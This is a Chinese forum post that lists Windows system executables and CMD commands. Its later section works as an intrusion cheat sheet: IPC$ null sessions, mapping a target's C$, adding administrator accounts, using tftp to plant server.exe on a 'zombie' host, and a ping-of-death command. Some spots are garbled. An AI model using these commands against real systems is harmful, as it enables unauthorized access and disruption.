|

楼主 |
BIOS
发表于 2015-05-28 12:42:13
ldifde.exe LDIF 目录交换命令行管理 (XP 不可用)
licmgr.exe 终端服务许可协议管理 (XP 不可用)
lights.exe 显示连接状况 (XP 不可用)
llsmgr.exe Windows 2000 许可协议管理 (XP 不可用)
llssrv.exe 启动许可协议服务器 (XP 不可用)
locator.exe RPC Locator 远程定位
lodctr.exe 调用性能计数
logoff.exe 注销当前用户
lpq.exe 显示远端的 LPD 打印队列的状态,显示被送到基于 Unix 的服务器的打印任务
lpr.exe 用于 Unix 客户打印机将打印任务发送给连接了打印设备的 NT 的打印机服务器。
lsass.exe 运行 LSA 和 Server 的 DLL
lserver.exe 指定默认 Server 新的 DNS 域 (XP 不可用)
lusrmgr.msc 本地账户管理
mmc 控制台
mplayer2 播放器
macfile.exe 管理 MACFILES (XP 不可用)
magnify.exe 放大镜
makecab.exe 制作 CAB 文件
mem.exe 显示内存状态
migpwd.exe 迁移密码
mmc.exe 控制台
mnmsrvc.exe 远程桌面共享
mobsync.exe 同步目录管理器
mountvol.exe 创建、删除或列出卷的装入点。
mplay32.exe Media Player 媒体播放器
mpnotify.exe 通知应用程序
mqbkup.exe 信息队列备份和恢复工具
mqmig.exe MSMQ Migration Utility 信息队列迁移工具
mrinfo.exe 使用 SNMP 多点传送路由
mscdexnt.exe 安装 MSCD
msdtc.exe 动态事务处理控制台
msg.exe 发送消息到本地或远程客户
mshta.exe HTML 应用程序主机
msiexec.exe 开始 Windows 安装程序
mspaint.exe 打开画图板
mstask.exe 任务计划表程序
mstinit.exe 任务计划表安装
Msconfig.exe 系统配置实用程序 (配置启动选项,服务项)
mem.exe 显示内存使用情况
mspaint 画图板
Net Stop Messenger 停止信使服务
Net Start Messenger 恢复信使服务
nslookup 网络管理的工具
Nslookup IP 地址侦测器
ntbackup 系统备份和还原
nbtstat.exe 使用 NBT(TCP/IP 上的 NetBIOS)显示协议统计和当前 TCP/IP 连接。
nddeapir.exe NDDE API 服务器端
netsh.exe 用于配置和监控 Windows 2000 命令行脚本接口(XP 不可用)
netstat.exe 显示协议统计和当前的 TCP/IP 网络连接。
nlsfunc.exe 加载特定国家的信息。Windows 2000 和 MS-DOS 子系统不使用该命令接受该命令只是为了与 MS-DOS 文件兼容。
notepad.exe 打开记事本
nslookup.exe 该诊断工具显示来自域名系统 (DNS) 名称服务器的信息。
ntbackup.exe 备份和故障修复工具
ntfrs.exe NT 文件复制服务 (XP 不可用)
ntvdm.exe 模拟 16 位 Windows 环境
nw16.exe NetWare 转向器
nwscript.exe 运行 Netware 脚本
odbcad32.exe 32 位 ODBC 数据源管理 (驱动程序管理)
odbcconf.exe 命令行配置 ODBC 驱动和数据源
packager.exe 对象包装程序
pathping.exe 包含 Ping 和 Tracert 的程序
pentnt.exe 检查 Pentium 的浮点错误
perfmon.exe 系统性能监视器
ping.exe 验证与远程计算机的连接
posix.exe 用于兼容 Unix
print.exe 打印文本文件或显示打印队列的内容。
progman.exe 程序管理器
psxss.exe Posix 子系统应用程序
qappsrv.exe 在网络上显示终端服务器可用的程序
qprocess.exe 在本地或远程显示进程的信息(需终端服务)
query.exe 查询进程和对话 (XP 不可用)
quser.exe 显示用户登陆的信息(需终端服务)
qwinsta.exe 显示终端服务的信息
rononce -p 15 秒关机
rasAdmin 远程访问服务.
regedit.exe 注册表编辑器
rasadmin.exe 启动远程访问服务 (XP 不可用)
rasautou.exe 建立一个 RAS 连接
rasdial.exe 宽带,拨号连接
ras.exe 运行 RAS 连接 (XP 不可用)
rcp.exe 计算机和运行远程外壳端口监控程序 rshd 的系统之间复制文件
rdpclip.exe 终端和本地复制和粘贴文件
recover.exe 从坏的或有缺陷的磁盘中恢复可读取的信息。
redir.exe 运行重定向服务
regedt32.exe 32 位注册服务
regini.exe 用脚本修改注册许可
regwiz.exe 注册向导
replace.exe 用源目录中的同名文件替换目标目录中的文件。
rexec.exe rexec 命令在执行指定命令前,验证远程计算机上的用户名,只有安装了 TCP/IP协议后才可以使用该命令。
risetup.exe 运行远程安装向导服务 (XP 不可用)
route.exe 控制网络路由表
rsh.exe 在运行 RSH 服务的远程计算机上运行命令
rsnotify.exe 远程存储通知回显
runas.exe 允许用户用其他权限运行指定的工具和程序
rundll32.exe 启动 32 位 DLL 程序
rwinsta.exe 重置会话子系统硬件和软件到最初的值
Sndvol32 音量控制程序
sfc.exe 或 CMD\ sfc.exe 回车 系统文件检查器
services.msc 网络连接服务
syskey 系统加密,(一旦加密就不能解开,保护 windows xp 系统的双重密码 wupdmgr WIDNOWS UPDATE)
SCANREG/RESTORE 命令恢复最近的注册表
secedit.exe 自动化安全性配置管理
services.exe 控制所有服务
sethc.exe 设置高对比
setver.exe 设置 MS-DOS 子系统向程序报告的 MS-DOS 版本号
sfc.exe 系统文件检查
shadow.exe 监控另外一台中端服务器会话
shrpubw.exe 建立和共享文件夹
sigverif.exe 文件签名验证
smlogsvc.exe 性能日志和警报 (XP 不可用)
sndrec32.exe 录音机
sndvol32.exe 显示声音控制信息
snmp.exe 简单网络管理协议 (XP 不可用)
snmptrap.exe SNMP 工具 (XP 不可用)
srvmgr.exe 服务器管理器 (XP 不可用)
subst.exe 将路径与驱动器盘符关联
sysedit.exe 系统配置编辑器
syskey.exe NT 账号数据库加密工具
sysocmgr.exe > Windows 安装程序
systray.exe 在低权限运行 systray
taskmgr 任务管理器
tasklist /svc(CMD)了解每个 SVCHOST 进程到底提供了多少系统服务(2000\98 不可用)
tlist -S(CMD) 了解每个 SVCHOST 进程到底提供了多少系统服务
taskman.exe 任务管理器 (XP 不可用)
taskmgr.exe 任务管理器
tcmsetup.exe 电话服务客户安装
tcpsvcs.exe TCP 服务
termsrv.exe 终端服务
tftp.exe 将文件传输到正在运行 TFTP 服务的远程计算机或从正在运行 TFTP 服务的远程计算机传输文件
themes.exe 桌面主题 (XP 不可用)
tlntadmn.exe Administrator Telnet 服务管理
tlntsess.exe 显示目前的 Telnet 会话
tlntsvr.exe 开始 Telnet 服务
tracert.exe 诊断实用程序将包含不同生存时间(TTL)值的Internet控制消息协议
(ICMP) 回显数据包发送到目标,以决定到达目标采用的路由
tsadmin.exe Administrator 终端服务管理器 (XP 不可用)
tscon.exe 粘贴用户会话到终端对话
tsdiscon.exe 断开终端服务的用户
tskill.exe 杀掉终端服务
tsprof.exe 用终端服务得出查询结果
tsshutdn.exe 关闭系统
unlodctr.exe 性能监视器的一部分
upg351db.exe 升级 Jet 数据库 (XP 不可用)
ups.exe UPS service UPS 服务
user.exe Windows 核心服务
userinit.exe 打开我的文档
usrmgr.exe 域用户管理器
utilman.exe 指定 2000 启动时自动打开那台机器
vwipxspx.exe 调用 IPX/SPX VDM
w32tm.exe 时间服务器
wextract.exe 解压缩 Windows 文件
winchat.exe 打开 Windows 聊天工具
winhlp32.exe 运行帮助系统
winmsd.exe 查看系统信息
winver.exe 显示 Windows 版本
wizmgr.exe Windows 管理向导 (XP 不可用)
wjview.exe Java 命令行调用 Java
write.exe 打开写字板
wscript.exe 脚本工具
wupdmgr.exe Windows update 运行 Windows update 升级向导
winver 检查 Windows 版本
Win98 系统工具
开始,运行,输入Msconfig系统配置实用工具配置启动选项,包括config.sys 、autoexec.bat、win.ini、system.ini 和注册表及程序菜单中的启动项。并可设置是否故障启动。
开始,运行,输入Regedit 注册表修改工具注册表编辑器,如果没有把握不要随意修改注册表!
开始,运行,输入Regsvr32 dll 注册工具当提示找不到dll文件时,可用此来注册该动态连接库。
开始,运行,输入 Regwiz 注册向导 用于注册。校验系统文件,并可恢复系统文件。
如果启动时出现类似*.vxd 文件错误,可用此恢复该 vxd 文件。
开始,运行,输入 Scandskw 磁盘扫描程序,用于扫描修复磁盘。如果磁盘或文件出现错误,可用来初步修复。
开始,运行,输入 DxDiag DirectX 诊断工具可用于检测 DirectX 运行是否正常。
开始,运行,输入 NETSCAPE
ESC:清除当前命令行;
F7:显示命令历史记录,以图形列表窗的形式给出所有曾经输入的命令,并可用上下箭头键选择再次执行该命令。
F8:搜索命令的历史记录,循环显示所有曾经输入的命令,直到按下回车键为止;
F9:按编号选择命令,以图形对话框方式要求您输入命令所对应的编号(从 0 开始),并将该命令显示在屏幕上;
Ctrl+H:删除光标左边的一个字符;
Ctrl+C Ctrl+Break,强行中止命令执行;
Ctrl+M:表示回车确认键;
Alt+F7:清除所有曾经输入的命令历史记录;
Alt+PrintScreen:截取屏幕上当前命令窗里的内容。
病毒破坏了系统文件,请使用杀毒软件查杀病毒,然后利用 Windows 2000 提供的“命令控制台”中的 Chkdsk /r 命令检查修复系统文件即可
net use \ip\ipc$ " " /user:" " 建立 IPC 空链接
net use \ip\ipc$ "密码" /user:"用户名" 建立 IPC 非空链接
net use h: \ip\c$ "密码" /user:"用户名" 直接登陆后映射对方 C:到本地为 H:
net use h: \ip\c$ 登陆后映射对方 C:到本地为 H:
net use \ip\ipc$ /del 删除 IPC 链接
net use h: /del 删除映射对方到本地的为 H:的映射
net user 用户名 密码 /add 建立用户
net user guest /active:yes JiHuo guest 用户
net user 查看有哪些用户
net user 帐户名 查看帐户的属性
net localgroup ***istrators 用户名 /add 把“用户”添加到管理员中使其具有管理员权限,注意:***istrator 后加 s 用复数
net start 查看开启了哪些服务
net start 服务名 开启服务;(如:net start telnet, net start schedule)
net stop 服务名 停止某服务
net time \目标 ip 查看对方时间
net time \目标 ip /set 设置本地计算机时间与“目标 IP”主机的时间同步,加上参数/yes
可取消确认信息
net view 查看本地局域网内开启了哪些共享
net view \ip 查看对方局域网内开启了哪些共享
net config 显示系统网络设置
net logoff 断开连接的共享
net pause 服务名 暂停某服务
net send ip "文本信息" 向对方发信息
net ver 局域网内正在使用的网络连接类型和信息
net share 查看本地开启的共享
net share ipc$ 开启 ipc
net share ipc$ /del 删除 ipc
net share c$ /del 删除 C:共享
net user guest 12345 用 guest 用户登陆后用将密码改为 12345
net password 密码 更改系统登陆密码
netstat -a 查看开启了哪些端口,常用 netstat -an
netstat -n 查看端口的网络连接情况,常用 netstat -an
netstat -v 查看正在进行的工作
netstat -p 协议名 例:netstat -p tcq/ip 查看某协议使用情况(查看 tcp/ip 协议使用情况)
netstat -s 查看正在使用的所有协议使用情况
nbtstat -A ip 对方 136 到 139 其中一个端口开了的话,就可查看对方最近登陆的用户名
(03 前的为用户名)-注意:参数-A 要大写
tracert -参数 ip(或计算机名) 跟踪路由(数据包),参数:“-w 数字”用于设置超时间隔。
ping ip(或域名) 向对方主机发送默认大小为 32 字节的数据,参数: -l[空格]数据包大小”;
“-n 发送数据次数”;“-t”指一直 ping。
ping -t -l 65550 ip 死亡之 ping(发送大于 64K 的文件并一直 ping 就成了死亡之 ping)
ipconfig (winipcfg) 用于 windows NT 及 XP(windows 95 98)查看本地 ip 地址,ipconfig
可用参数“/all”显示全部配置信息
tlist -t 以树行列表显示进程(为系统的附加工具,默认是没有安装的,在安装目录的Support/tools文件夹内)
kill -F 进程名 加-F 参数后强制结束某进程(为系统的附加工具,默认是没有安装的,在安装目录的 Support/tools 文件夹内)
del -F 文件名 加-F 参数后就可删除只读文件,/AR、/AH、/AS、/AA 分别表示删除只读、隐藏、系统、存档文件,/A-R、/A-H、/A-S、/A-A 表示删除除只读、隐藏、系统、存档以外的文件。例如“DEL/AR *.*”表示删除当前目录下所有只读文件,“DEL/A-S *.*”表示删除当前目录下除系统文件以外的所有文件move 盘符\路径\要移动的文件名存放移动文件的路径\移动后文件名移动文件,用参数
/y 将取消确认移动目录存在相同文件的提示就直接覆盖
fc one.txt two.txt > 3st.txt 对比二个文件并把不同之处输出到 3st.txt 文件中,"> "和"> >" 是重定向命令
at id 号 开启已注册的某个计划任务
at /delete 停止所有计划任务,用参数/yes 则不需要确认就直接停止
at id 号 /delete 停止某个已注册的计划任务
at 查看所有的计划任务
at \ip time 程序名(或一个命令) /r 在某时间运行对方某程序并重新启动计算机
finger username @host 查看最近有哪些用户登陆
telnet ip 端口 远和登陆服务器,默认端口为 23
open ip 连接到 IP(属 telnet 登陆后的命令)
telnet 在本机上直接键入 telnet 将进入本机的 telnet
copy 路径\文件名 1 路径\文件名 2 /y 复制文件 1 到指定的目录为文件 2,用参数/y 就同时取消确认你要改写一份现存目录文件
copy c:\srv.exe \ip\***$ 复制本地 c:\srv.exe 到对方的***下
cppy 1st.jpg/b+2st.txt/a 3st.jpg 将 2st.txt 的内容藏身到 1st.jpg 中生成 3st.jpg 新的文件,注:2st.txt 文件头要空三排,参数:/b 指二进制文件,/a 指 ASCLL 格式文件
copy \ip\***$\svv.exe c:\ 或:copy\ip\***$\*.* 复制对方***i.exe 文件(所有文件)至本地
C:
xcopy 要复制的文件或目录树 目标地址\目录名 复制文件和目录树,用参数/Y 将不提示覆盖相同文件
tftp -i 自己 IP(用肉机作跳板时这用肉机 IP) get server.exe c:\server.exe 登陆后,将“IP”
的 server.exe 下载到目标主机 c:\server.exe 参数:-i 指以二进制模式传送,如传送 exe 文件时用,如不加-i 则以 ASCII 模式(传送文本文件模式)进行传送
tftp -i 对方 IP put c:\server.exe 登陆后,上传本地 c:\server.exe 至主机
ftp ip 端口 用于上传文件至服务器或进行文件操作,默认端口为 21。bin 指用二进制方式传送(可执行文件进);默认为 ASCII 格式传送(文本文件时)
route print 显示出 IP 路由,将主要显示网络地址 Network addres,子网掩码 Netmask,
网关地址 Gateway addres,接口地址 Interface
arp 查看和处理 ARP 缓存,ARP 是名字解析的意思,负责把一个 IP 解析成一个物理性的
MAC 地址。arp -a 将显示出全部信息
start 程序名或命令 /max 或/min 新开一个新窗口并最大化(最小化)运行某程序或命令
mem 查看 cpu 使用情况
attrib 文件名(目录名) 查看某文件(目录)的属性
attrib 文件名 -A -R -S -H 或 +A +R +S +H 去掉(添加)某文件的 存档,只读,系统,隐藏 属性;用+则是添加为某属性dir 查看文件,参数:/Q 显示文件及目录属系统哪个用户,/T:C 显示文件创建时间,/T:A显示文件上次被访问时间,/T:W 上次被修改时间date /t 、 time /t 使用此参数即“DATE/T”、“TIME/T”将只显示当前日期和时间,而不必输入新日期和时间
set 指定环境变量名称=要指派给变量的字符 设置环境变量
set 显示当前所有的环境变量
set p(或其它字?/ca>
一般 CMD 回车后在 C 盘的文档目录
到 C 盘的根目录只要输入 cd\ 再按回车即可
到 D 盘输入 D: 按回车即可
其它盘也只要输入盘符加冒号 按回车
|
|